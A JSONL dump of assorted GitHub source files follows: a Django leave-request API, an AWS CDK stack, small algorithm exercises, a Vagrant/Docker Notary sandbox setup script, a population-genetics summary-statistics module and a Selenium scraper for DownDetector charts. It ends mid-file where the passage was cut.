+{"seq_id":"23994749870","text":"\nimport datetime\nfrom datetime import date\nfrom leave.models import Leave, LeaveSummary\nfrom mysite.share.views import getUsername, handleInput, urlResponse, verifyAndGenNewToken, sessionExpiredResponse, wrongParameterResponse\n\ndef leaveSummary(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leaveSummary = LeaveSummary.objects.filter(username=username, is_deleted=0)\n return urlResponse({'data': [LeaveSummary.deserialize(ls) for ls in leaveSummary]}, 200, authorization)\n\ndef leaveComing(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(username=username, leave_date__gte=date.today(), rejected_remark='', is_deleted=0).exclude(approved_by='').order_by('leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leavePending(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(username=username, approved_by='', rejected_remark='', is_deleted=0).order_by('leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leaveHistory(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(username=username, leave_date__lt=date.today(), is_deleted=0).exclude(approved_by='').order_by('-leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leaveApproval(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = handleInput(request, ['username'], 'GET')\n if username is None:\n return wrongParameterResponse()\n leave = Leave.objects.filter(approver=username, approved_by='', is_deleted=0).order_by('-leave_date')\n return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef applyLeave(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n leave_type, leave_from, fromTime, leave_to, toTime, approver, attachment, remark = handleInput(request, \n ['leave_type', 'from', 'fromTime', 'to', 'toTime', 'approver', 'attachment', 'remark'], 'POST')\n leaveFrom = leave_from.split('T')\n startDate = datetime.datetime(leaveFrom[0], leaveFrom[1], leaveFrom[2], 0, 0)\n leaveTo = leave_to.split('T')\n endDate = datetime.datetime(leaveTo[0], leaveTo[1], leaveTo[2], 0, 0)\n delta = datetime.timedelta(days=1)\n numberOfLeaveTaken = 0\n while (startDate <= endDate):\n newLeave = dict()\n newLeave['created_by'] = username\n newLeave['updated_by'] = username\n newLeave['username'] = username\n newLeave['leave_type'] = leave_type\n newLeave['leave_date'] = startDate\n newLeave['approver'] = approver\n newLeave['attachment'] = attachment\n newLeave['remark'] = remark\n if numberOfLeaveTaken == 0:\n if len(fromTime) > 0:\n newLeave['leave_date_time'] = fromTime\n numberOfLeaveTaken -= 0.5\n if startDate == endDate: \n if len(toTime) > 0:\n newLeave['leave_date_time'] = toTime\n numberOfLeaveTaken -= 0.5\n startDate += delta\n numberOfLeaveTaken += 1\n newLeaveRecord = Leave()\n newLeaveRecord.saveNew(newLeave)\n leaveSummary = LeaveSummary.objects.filter(username=username, is_deleted=0, leave_type=leave_type).first()\n leaveSummary.leave_balance -= numberOfLeaveTaken\n leaveSummary.save()\n return urlResponse({'message': 'Data successfully addded!'}, 200, authorization)","repo_name":"Justaway97/back-end-template","sub_path":"mysite/leave/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33059350465","text":"from aws_cdk import (\n Environment,\n RemovalPolicy,\n Stage,\n Duration,\n Stack,\n pipelines as cdkpipe,\n aws_codepipeline as pipe,\n aws_sqs as sqs,\n aws_s3 as s3\n)\nfrom constructs import Construct\nimport random, string\n\n\ndef generate_random_string(length):\n characters = string.ascii_letters + string.digits\n random_string = ''.join(random.choice(characters) for _ in range(length))\n return random_string\n\nrandom_string = generate_random_string(10)\n\nclass ResourceEuropeStack(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n queue = sqs.Queue(\n self, \"MyEuropeanQueue\",\n visibility_timeout=Duration.seconds(300),\n )\n bucket = s3.Bucket(self, \"myEuropeanBucket\", \n bucket_name=f\"my-european-bucket-{random_string.lower()}\",\n versioned=True,\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n auto_delete_objects=True,\n removal_policy=RemovalPolicy.DESTROY\n )\n \nclass DeployEuropeStage(Stage):\n def __init__(self, scope: Construct, construct_id: str, env: Environment, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n ResourceEuropeStack(self, 'ResourceStack', env=env, stack_name='test-stack-in-EUROPE')\n","repo_name":"andreistavarache/aws-cdk-pipeline","sub_path":"aws_cdk_pipeline/europe_resources.py","file_name":"europe_resources.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1132098238","text":"# 내 풀이\n# 연산자 우선순위 재정의하여 만들 수 있는 가장 큰 숫자 제출(+,-,*), 절댓값\n# 연산자 들을 리스트에 담아서 중복걸러낸 다음에 우선순위 정함\n# 같은 연산자 끼리는 앞에 있는 것의 우선순위가 더 높다\n# 문자열 수식을 계산하는 eval()이용 \nimport math\nfrom itertools import permutations\ndef solution(ex):\n res = [] # 연산자를 기준으로 문자열을 잘라서 저장하는 리스트\n ans = [] # 우선순위에 따라 나올 수 있는 값들의 리스트\n k = [\"-\",\"+\",\"*\"]\n _k = [i for i in ex if i in k]\n l = [(i,j) for i,j in enumerate(ex) if j in k] # -,+,* 가 들어있는 인덱스와 값 저장 \n dup = list(set(_k))\n \n # 잘라서 넣기\n for i in range(len(l)):\n if i == 0:\n b = l[0][0]\n print(b)\n res.append(ex[:b])\n res.append(ex[b])\n else:\n a = b + 1 # start\n b = l[i][0] # end\n res.append(ex[a:b])\n res.append(ex[b])\n res.append(ex[b+1:])\n print(res)\n \n p = list(permutations(dup,len(dup))) # 우선순위 조합\n print(p)\n \n # 우선순위에 맞게 계산\n for i in range(len(p)): # 우선순위 조합 탐색\n arr = res[:]\n for j in range(len(dup)): # 연산자 우선순위(1,2,3) 탐색\n x = arr.count(p[i][j])\n for _ in range(x): # 같은 연산자 여러개면 그 개수만큼 반복\n r = arr.index(p[i][j])\n arr[r-1] = str(eval(arr[r-1]+arr[r]+arr[r+1])) # 연산자로 계산해서 그 값을 리스트에 다시 저장\n del arr[r] \n del arr[r]\n print(arr)\n ans.append(abs(int(arr[0])))\n # print(ans)\n # print(p) \n return int(max(ans))\n\n\n \n# 더 나은 풀이\n# 정규 표현식 이용\nimport re\nfrom itertools import permutations\n\ndef solution(expression):\n #1\n op = [x for x in ['*','+','-'] if x in expression]\n op = [list(y) for y in permutations(op)]\n ex = re.split(r'(\\D)',expression)\n\n #2\n a = []\n for x in op:\n _ex = ex[:]\n for y in x:\n while y in _ex:\n tmp = _ex.index(y)\n _ex[tmp-1] = str(eval(_ex[tmp-1]+_ex[tmp]+_ex[tmp+1])) # 나랑 똑같은 방식\n _ex = _ex[:tmp]+_ex[tmp+2:] # del로 제거하는 대신에 슬라이싱 이용 \n a.append(_ex[-1])\n\n #3\n return max(abs(int(x)) for x in a)","repo_name":"yeye921/algorithm-study","sub_path":"Level2/maximize_formula.py","file_name":"maximize_formula.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30317742726","text":"# Напишите программу, которая определит позицию второго вхождения строки в списке либо сообщит, что её нет.\n# *Пример:*\n# - список: [\"qwe\", \"asd\", \"zxc\", \"qwe\", \"ertqwe\"], ищем: \"qwe\", ответ: 3\n# - список: [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\", \"йцу\"], ищем: \"йцу\", ответ: 5\n# - список: [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\"], ищем: \"йцу\", ответ: -1\n# - список: [\"123\", \"234\", 123, \"567\"], ищем: \"123\", ответ: -1\n# - список: [], ищем: \"123\", ответ: -1\n\n# my_list = [\"123\", \"234\", 123, '567']\n# print(my_list)\n\n# string_find = \"123\"\n# count = 0\n# for i in range(len(my_list)):\n# if string_find == my_list[i]:\n# count += 1\n# if count == 2:\n# print(i)\n# else:\n# print(-1)\n\nmy_list = [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\", \"йцу\"]\nmy_str = input('Введите строку')\n\nif my_list.count(my_str) > 1:\n first_index = my_list.index(my_str)\n print(my_list.index(my_str, first_index + 1))\nelse:\n print(-1)\n\n# Улучшение кода:\n\nfrom typing import List \n\ndef find_second_entry(str_list: List[str], search_word: str):\n try:\n return [i for i, elem in enumerate(str_list) if elem == search_word][1]\n except IndexError:\n return -1","repo_name":"dvsni/Python","sub_path":"Task #6.5.py","file_name":"Task #6.5.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20310603720","text":"import random\nimport string\n\nfrom shutit_module import ShutItModule\n\nclass shutit_notary_trust_sandbox(ShutItModule):\n\n\n\tdef build(self, shutit):\n\t\tvagrant_image = shutit.cfg[self.module_id]['vagrant_image']\n\t\tvagrant_provider = shutit.cfg[self.module_id]['vagrant_provider']\n\t\tgui = shutit.cfg[self.module_id]['gui']\n\t\tmemory = shutit.cfg[self.module_id]['memory']\n\t\tmodule_name = 'shutit_notary_trust_sandbox_' + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(6))\n\t\tshutit.send('rm -rf /tmp/' + module_name + ' && mkdir -p /tmp/' + module_name + ' && cd /tmp/' + module_name)\n\t\tshutit.send('vagrant init ' + vagrant_image)\n\t\tshutit.send_file('/tmp/' + module_name + '/Vagrantfile','''\nVagrant.configure(2) do |config|\n config.vm.box = \"''' + vagrant_image + '''\"\n # config.vm.box_check_update = false\n # config.vm.network \"forwarded_port\", guest: 80, host: 8080\n # config.vm.network \"private_network\", ip: \"192.168.33.10\"\n # config.vm.network \"public_network\"\n # config.vm.synced_folder \"../data\", \"/vagrant_data\"\n config.vm.provider \"virtualbox\" do |vb|\n vb.gui = ''' + gui + '''\n vb.memory = \"''' + memory + '''\"\n vb.name = \"shutit_notary_trust_sandbox\"\n end\nend''')\n\t\tshutit.send('vagrant up --provider virtualbox',timeout=99999)\n\t\tshutit.login(command='vagrant ssh')\n\t\tshutit.login(command='sudo su -',password='vagrant')\n\t\tshutit.install('apt-transport-https')\n\t\tshutit.install('ca-certificates') \n\t\tshutit.send('apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D')\n\t\tshutit.send('touch /etc/apt/sources.list.d/docker.list')\n\t\tshutit.send('''cat > /etc/apt/sources.list.d/docker.list << END\ndeb https://apt.dockerproject.org/repo ubuntu-trusty main\nEND''')\n\t\tshutit.send('apt update -y')\n\t\tshutit.send('apt-cache policy docker-engine')\n\t\tshutit.install('docker-engine')\n\t\tshutit.send('curl -L https://github.com/docker/compose/releases/download/1.8.0/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose')\n\t\tshutit.send('chmod +x /usr/local/bin/docker-compose')\n\t\tshutit.send('''cat > docker-compose.yml << END\nversion: \"2\"\nservices:\n notaryserver:\n image: dockersecurity/notary_autobuilds:server-v0.3.0\n volumes:\n - notarycerts:/go/src/github.com/docker/notary/fixtures\n networks:\n - sandbox\n environment:\n - NOTARY_SERVER_STORAGE_TYPE=memory\n - NOTARY_SERVER_TRUST_SERVICE_TYPE=local\n sandboxregistry:\n image: registry:2.4.1\n networks:\n - sandbox\n container_name: sandboxregistry\n trustsandbox:\n image: docker:dind\n networks:\n - sandbox\n volumes:\n - notarycerts:/notarycerts\n privileged: true\n container_name: trustsandbox\n entrypoint: \"\"\n command: |-\n sh -c '\n cp /notarycerts/root-ca.crt /usr/local/share/ca-certificates/root-ca.crt &&\n update-ca-certificates &&\n dockerd-entrypoint.sh --insecure-registry sandboxregistry:5000'\nvolumes:\n notarycerts:\n external: false\nnetworks:\n sandbox:\n external: false\nEND''')\n\t\tshutit.send('docker-compose up -d')\n\t\tshutit.login('docker exec -it trustsandbox sh')\n\t\tshutit.pause_point('')\n\t\tshutit.send('docker pull docker/trusttest')\n\t\tshutit.send('docker tag docker/trusttest sandboxregistry:5000/test/trusttest:latest')\n\t\tshutit.send('export DOCKER_CONTENT_TRUST=1')\n\t\tshutit.send('export DOCKER_CONTENT_TRUST_SERVER=https://notaryserver:4443')\n\t\tshutit.send('docker pull sandboxregistry:5000/test/trusttest')\n\t\tshutit.logout()\n\t\tshutit.send('docker logs trustsandbox')\n\t\tshutit.pause_point('')\n\n\n\t\tshutit.logout()\n\t\tshutit.logout()\n\t\treturn True\n\n\tdef get_config(self, shutit):\n\t\tshutit.get_config(self.module_id,'vagrant_image',default='ubuntu/trusty64')\n\t\tshutit.get_config(self.module_id,'vagrant_provider',default='virtualbox')\n\t\tshutit.get_config(self.module_id,'gui',default='false')\n\t\tshutit.get_config(self.module_id,'memory',default='1024')\n\n\t\treturn True\n\n\tdef test(self, shutit):\n\n\t\treturn True\n\n\tdef finalize(self, shutit):\n\n\t\treturn True\n\n\tdef isinstalled(self, shutit):\n\n\t\treturn False\n\n\tdef start(self, shutit):\n\n\t\treturn True\n\n\tdef stop(self, shutit):\n\n\t\treturn True\n\ndef module():\n\treturn shutit_notary_trust_sandbox(\n\t\t'imiell.shutit_notary_trust_sandbox.shutit_notary_trust_sandbox', 1243692531.0001, \n\t\tdescription='',\n\t\tmaintainer='',\n\t\tdelivery_methods=['bash'],\n\t\tdepends=['shutit.tk.setup','shutit-library.virtualbox.virtualbox.virtualbox','tk.shutit.vagrant.vagrant.vagrant']\n\t)\n","repo_name":"ianmiell/shutit-notary-trust-sandbox","sub_path":"shutit_notary_trust_sandbox.py","file_name":"shutit_notary_trust_sandbox.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24769558476","text":"import numpy as np\nsize = int(input(\"Enter the size of array:: \"))\narr = np.random.randint(1,1000,size=size)\n#np.set_printoptions(threshold=np.inf)\nprint(\"Original array::\",arr)\ndef selection_desc(array):\n i= 0\n while iarray[max_index]:\n max_index = j\n j+=1\n swap(array,i,max_index)\n i+=1\ndef swap(array,num,num2):\n array[num],array[num2] = array[num2],array[num]\nnp.set_printoptions(threshold=np.inf)\nselection_desc(arr)\nprint(\"Sorted descending array::\",arr)\n","repo_name":"ypradhan222/mtech_code","sub_path":"ALgorithms/selection_desc.py","file_name":"selection_desc.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"15862247720","text":"import os\nimport collections\nimport dendropy\nfrom sisterbayes import model\n\nclass SisterBayesSummaryStatsCalculator(object):\n\n def __init__(self, **kwargs):\n self.output_prefix = kwargs.pop(\"output_prefix\", \"sisterbayes\")\n self.is_unfolded_site_frequency_spectrum = kwargs.pop(\"is_unfolded_site_frequency_spectrum\", False)\n self.is_calculate_single_population_sfs = kwargs.pop(\"is_calculate_single_population_sfs\", False)\n self.is_calculate_joint_population_sfs = kwargs.pop(\"is_calculate_joint_population_sfs\", True)\n self.stat_label_prefix = kwargs.pop(\"stat_label_prefix\", \"stat\")\n self.supplemental_labels = kwargs.pop(\"supplemental_labels\", None)\n self.alignment_directory_head = kwargs.pop(\"alignment_directory_head\", None)\n self.field_delimiter = kwargs.pop(\"field_delimiter\", \"\\t\")\n self.is_concatenate_loci = kwargs.pop(\"is_concatenate_loci\", False)\n self.concatenated_locus_label = kwargs.pop(\"concatenated_locus_label\", None)\n self.is_normalize = kwargs.pop(\"is_normalize\", False)\n locus_info = kwargs.pop(\"locus_info\", None)\n params = kwargs.pop(\"params\", None) # ignore\n if locus_info:\n self.model = model.SisterBayesModel(params_d=None, locus_info=locus_info,)\n else:\n self.model = None\n if kwargs:\n raise Exception(\"Unrecognized configuration entries: {}\".format(kwargs))\n self.default_state_alphabet = dendropy.new_standard_state_alphabet(\"0123456789ACGTU\", case_sensitive=False)\n\n def read_data(self, filepath, datatype, schema, taxon_namespace=None):\n if not os.path.isabs(filepath) and self.alignment_directory_head is not None:\n filepath = os.path.join(self.alignment_directory_head, filepath)\n if datatype == \"dna\":\n data = dendropy.DnaCharacterMatrix.get(\n path=filepath,\n schema=schema,\n taxon_namespace=taxon_namespace)\n elif datatype == \"standard\" or datatype == \"snp\":\n data = dendropy.StandardCharacterMatrix.get(\n path=filepath,\n schema=schema,\n taxon_namespace=taxon_namespace,\n default_state_alphabet=self.default_state_alphabet)\n return data\n\n def _process_sequences(\n self,\n results_d,\n field_name_prefix,\n sequences,\n num_genes_deme0,\n num_genes_deme1,\n nsites):\n d0_sequences = sequences[:num_genes_deme0]\n d1_sequences = sequences[num_genes_deme0:]\n assert len(d0_sequences) == num_genes_deme0\n assert len(d1_sequences) == num_genes_deme1\n assert len(sequences) == num_genes_deme0 + num_genes_deme1\n jsfs = self.folded_joint_site_frequency_spectrum(\n d0_sequences=d0_sequences,\n d1_sequences=d1_sequences,)\n for row_idx in range(len(jsfs)):\n for col_idx in range(len(jsfs[row_idx])):\n raw_count = float(jsfs[row_idx][col_idx])\n if self.is_normalize:\n result_value = float(raw_count) / nsites\n else:\n result_value = raw_count\n results_d[\"{}.{}.{}\".format(field_name_prefix, row_idx, col_idx)] = result_value\n\n def write_summary_stats(self,\n dest=None,\n results_store=None,\n is_write_header=True,\n ):\n results_d = collections.OrderedDict()\n if self.supplemental_labels:\n for key in self.supplemental_labels:\n results_d[key] = self.supplemental_labels[key]\n for lineage_pair_idx, lineage_pair in enumerate(self.model.lineage_pairs):\n if self.is_concatenate_loci:\n if self.concatenated_locus_label:\n concatenated_locus_label = self.concatenated_locus_label\n else:\n concatenated_locus_label = model.compose_concatenated_locus_label(lineage_pair)\n field_name_prefix=\"{}.{}.{}.joint.sfs\".format(\n self.stat_label_prefix,\n lineage_pair.label,\n concatenated_locus_label,\n )\n num_genes_deme0 = None\n num_genes_deme1 = None\n nsites = 0\n master_data = dendropy.StandardCharacterMatrix(default_state_alphabet=self.default_state_alphabet)\n for locus_idx, locus_definition in enumerate(lineage_pair.locus_definitions):\n if num_genes_deme0 is None:\n num_genes_deme0 = locus_definition.num_genes_deme0\n num_genes_deme1 = locus_definition.num_genes_deme1\n else:\n if (num_genes_deme0 != locus_definition.num_genes_deme0) or (num_genes_deme0 != locus_definition.num_genes_deme0):\n raise ValueError(\"Cannot concatenate loci if number of samples per deme vary across loci\")\n data = self.read_data(\n filepath=locus_definition.alignment_filepath,\n datatype=\"standard\",\n schema=\"fasta\",\n taxon_namespace=master_data.taxon_namespace)\n nsites += locus_definition.num_sites\n master_data.extend_sequences(data, is_add_new_sequences=True)\n sequences = master_data.sequences()\n self._process_sequences(\n results_d,\n field_name_prefix,\n sequences=sequences,\n num_genes_deme0=num_genes_deme0,\n num_genes_deme1=num_genes_deme1,\n nsites=nsites,\n )\n else:\n for locus_definition in lineage_pair.locus_definitions:\n field_name_prefix=\"{}.{}.{}.joint.sfs\".format(\n self.stat_label_prefix,\n lineage_pair.label,\n locus_definition.locus_label)\n data = self.read_data(\n filepath=locus_definition.alignment_filepath,\n datatype=\"standard\",\n schema=\"fasta\")\n sequences = data.sequences()\n self._process_sequences(\n results_d,\n field_name_prefix,\n sequences=sequences,\n num_genes_deme0=locus_definition.num_genes_deme0,\n num_genes_deme1=locus_definition.num_genes_deme1,\n nsites=locus_definition.num_sites,\n )\n if is_write_header:\n dest.write(self.field_delimiter.join(results_d.keys()))\n dest.write(\"\\n\")\n dest.write(self.field_delimiter.join(\"{}\".format(v) for v in results_d.values()))\n dest.write(\"\\n\")\n return results_d\n\n def folded_joint_site_frequency_spectrum(self,\n d0_sequences,\n d1_sequences,\n is_discard_multiple_mutation_site=True):\n deme_sequences = (d0_sequences, d1_sequences)\n # weirdly, FastsimCoal2 puts first deme second axis, i.e. columns,\n # while second deme gets put on rows\n jsfs = [[0 for i in range(len(d0_sequences)+1)] for j in range(len(d1_sequences)+1)]\n num_demes = 2\n nsites = None\n deme_site_columns = []\n for deme_idx in range(num_demes):\n deme_sites = list(zip(*(s.symbols_as_list() for s in deme_sequences[deme_idx])))\n if nsites is None:\n nsites = len(deme_sites)\n else:\n assert len(deme_sites) == nsites\n deme_site_columns.append(deme_sites)\n for site_idx in range(len(deme_site_columns[0])):\n deme_counters = []\n pooled_counter = collections.Counter()\n for deme_idx in range(num_demes):\n deme_counter = collections.Counter(deme_site_columns[deme_idx][site_idx])\n deme_counters.append(deme_counter)\n pooled_counter.update(deme_counter)\n if len(pooled_counter) == 1:\n jsfs[0][0] += 1\n continue\n majority_allele = pooled_counter.most_common(1)[0][0]\n del pooled_counter[majority_allele]\n if is_discard_multiple_mutation_site and len(pooled_counter) > 1:\n continue\n for deme_idx in range(num_demes):\n del deme_counters[deme_idx][majority_allele]\n jsfs[sum(deme_counters[1].values())][sum(deme_counters[0].values())] += 1\n return jsfs\n","repo_name":"jeetsukumaran/SisterBayes","sub_path":"src/sisterbayes/sumstats.py","file_name":"sumstats.py","file_ext":"py","file_size_in_byte":8910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32888653739","text":"import uuid\nfrom io import BytesIO\n\nimport validators\nfrom lib.common.errhelper import ErrHelper\nfrom PIL import Image\nfrom pyvirtualdisplay import Display\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nOK = \"no current problems\"\nDOWN = \"reports indicate problems\"\nWARNING = \"indicate possible problems\"\n\n\nclass DownDetector:\n \"\"\"\n A helper class for interacting with and scraping the downdetector.com website\n \"\"\"\n\n def __init__(self, output_dir=\"plugins/lib/common/tmp\", chart_wait=2, ads_wait=2):\n \"\"\"\n Initializes the DownDetector class\n :param output_dir: the directory to save the downloaded charts to\n :param chart_wait: the amount of time to wait for the chart to load\n :param ads_wait: the amount of time to wait for the ads to load\n \"\"\"\n self.output_dir = output_dir\n self.bad_characters = '\\\\/;*?\"<>$#@!|[}]{=^%'\n self.chart_wait = chart_wait\n self.ads_wait = ads_wait\n\n def chart(self, service, search=False):\n \"\"\"\n Gets the chart of a service from downdetector.com\n :param service: the service to get the chart for (e.g. \"escape-from-tarkov\")\n :param search: Defaults to False, set to True if you want to attempt to search for a service rather than an exact match on a service name - (e.g. \"escape from tarkav\" - with a typo)\n :return file_name: the path to the downloaded chart (String) - False if anything fails\n :return status: best effort guess of the status of the service (String)\n\n Note: The service can be found in the url after /status/ -> https://downdetector.com/status/escape-from-tarkov/\n\n Note: If the 'search' flag is set to True, the service will be searched for rather than a straight up GET call. If you can use the exact service name, it is recommended\n \"\"\"\n\n try:\n display = Display(visible=0, size=(1920, 1080))\n display.start()\n\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless\")\n options.add_argument(\"log-level=3\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\n \"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\"\n )\n\n # Initializing webdriver for Chrome with our options\n driver = webdriver.Chrome(options=options)\n\n # If the search flag was provided, we search for the service in DownDetector\n if search:\n driver.get(\n f\"https://downdetector.com/search/?q={service.replace(' ', '+')}\"\n )\n\n # If the search flag was not provided, we attempt to go directly to the service page\n else:\n driver.get(f\"https://downdetector.com/status/{service}/\")\n\n try:\n # If we used the search flag, check the page to ensure a result was found\n if search:\n # check the search input\n if self.bad_input(service):\n # close browser\n driver.close()\n driver.quit()\n display.stop()\n return False, f\"❌ Bad search string: `{service}`\"\n\n # If the search returned no results, return None\n # dev note: the /search/ url stays if no results are found\n if \"/search/?q=\" in driver.current_url:\n return None, None\n\n # Wait for the chart to load\n WebDriverWait(driver, self.chart_wait).until(\n EC.presence_of_element_located((By.ID, \"chart-row\"))\n )\n except TimeoutException:\n # If the chart did not load, we have to exit\n return False, False\n\n # Wait for the ads banner to load and delete it if it does\n # NOTE: This is a hacky way to do this, but it works for now\n # If the element ID of the ads banner at the top of the DownDetector page changes, this will break\n # If the ads banner is not present, this should timeout and continue as usual\n try:\n # Wait for ads banner to load by looking for the element ID\n WebDriverWait(driver, self.ads_wait).until(\n EC.presence_of_element_located((By.ID, \"ad-leaderboard\"))\n )\n # If the ads banner is present, delete it so that we can capture a proper chart screenshot\n js_string = 'var element = document.getElementById(\"ad-leaderboard\");element.remove();'\n driver.execute_script(js_string)\n except TimeoutException:\n pass\n\n # Get the chart element\n chart_elem = driver.find_element(\n By.XPATH, \"//body/div[3]/div[2]/div[1]/div[2]/div[1]\"\n )\n\n # Get the sizes of the chart for cropping\n location = chart_elem.location\n size = chart_elem.size\n x = location[\"x\"]\n y = location[\"y\"]\n h = location[\"y\"] + size[\"height\"]\n w = location[\"x\"] + size[\"width\"]\n\n # Save the chart screenshot to memory\n p = driver.get_screenshot_as_png()\n\n # Open the captured image to crop it\n img_open = Image.open(BytesIO(p))\n\n # Crop the image\n img_crop = img_open.crop((x, y, w, h))\n\n # Save the cropped image\n # Example url https://downdetector.com/status/escape-from-tarkov/\n file_name = f\"{self.output_dir}/{service}-{uuid.uuid4()}.png\"\n img_crop.save(file_name)\n\n try:\n # Make a best effort attempt to get the status of the service from the page header\n page_header = driver.find_element(\n By.XPATH,\n \"/html[1]/body[1]/div[3]/div[2]/div[1]/div[1]/div[1]/div[1]\",\n )\n # Get the header text\n page_header_text = page_header.text.strip().lower()\n\n # Get and format the service name from the URL\n service_name = (\n driver.current_url.split(\"/status/\")[-1]\n .replace(\"-\", \" \")\n .replace(\"/\", \"\")\n )\n\n # Set the status based on the text of the header page\n if OK in page_header_text:\n status = f\"🟢 User reports do not indicate problems for **{service_name}**\"\n elif DOWN in page_header_text:\n status = f\"🔴 User reports indicate problems for **{service_name}**\"\n elif WARNING in page_header_text:\n status = f\"🟡 User reports indicate possible problems for **{service_name}**\"\n else:\n # unknown status, maybe DownDetector changed their page layout\n status = f\"❓ The status of **{service_name}** is unknown due to a processing error\"\n except:\n status = f\"❓ The status of **{service_name}** is unknown due to a processing error\"\n\n # close browser\n driver.close()\n driver.quit()\n display.stop()\n\n return file_name, status\n\n except Exception as error:\n ErrHelper().capture(error)\n\n # close browser in the case of an error\n driver.close()\n driver.quit()\n display.stop()\n\n return False, \"❌ A critical error occurred while trying to get the chart\"\n\n def bad_input(self, data):\n \"\"\"\n Helper function to check if provided data is 'bad'\n Bad could be data that is not a valid search string or malicious\n :param data: data to check (String)\n :return bool: true if bad data - false otherwise\n \"\"\"\n # If the provided input is a URL, it is bad\n if validators.url(data):\n return True\n\n # Check against our 'bad_characters' list\n for sub_string in self.bad_characters:\n if sub_string in data:\n # If a 'bad character' is found, return true\n return True\n\n # Add more check here...\n\n return False\n","repo_name":"GrantBirki/errbot","sub_path":"src/errbot/plugins/lib/common/down_detector.py","file_name":"down_detector.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"}
+{"seq_id":"27686435831","text":"import os\n\n\ndef make_user_database(p):\n path = (str(p)[:5])\n print(path)\n is_exist = os.path.exists(\"data/\"+path)\n print(is_exist)\n if is_exist:\n message = \"Masz już swoją bazę, nie mogę utworzyć drugiej!\"\n if not is_exist:\n os.makedirs(\"data/\"+path)\n message = \"Utworzyłem dla Ciebie własną bazę - możesz tworzyć już swoje listy!\"\n return message\n\n\ndef check_user_database(p):\n path = (str(p)[:5])\n is_exist = os.path.exists(\"data/\" + path)\n if not is_exist:\n message = \"Nie widzę Twojej bazy - przed działaniem musisz ją utworzyć komendą .make_base\"\n return message\n if is_exist:\n return path\n\n\ndef checklist(dire, p):\n if p is None:\n p = 'main'\n print(p.isalnum())\n if p.isalnum() is False:\n message = \"Nie ma takiej listy - podano znaki niealfanumeryczne!\"\n code = 2\n return [message, code]\n p = p.lower()\n is_exist = os.path.exists(\"data/\"+dire+'/'+p+'.txt')\n if not is_exist:\n message = \"Nie ma takiej listy - musisz ją utworzyć komendą .add_list\"\n code = 1\n else:\n message = \"Widzę taką listę - zabieram się do działania!\"\n code = 0\n return [message, code]\n\n\ndef add_list(dire, p):\n a = checklist(dire, p)[1]\n if a == 2:\n message = checklist(dire, p)[0]\n return message\n if a == 0:\n message = \"Taka lista już istnieje - nadpisz ją używając odpowiedniej komendy!\"\n return message\n else:\n print(\"Type of dire:\"+str(type(dire)))\n print(\"Type of p:\" + str(type(p)))\n if p is None:\n p = \"main\"\n with open(\"data/\"+dire+\"/\"+p+'.txt', 'a') as f1:\n f1.write('p\\n')\n f1.close()\n with open(\"data/\" + dire + \"/main.txt\", 'r') as f2:\n line1 = 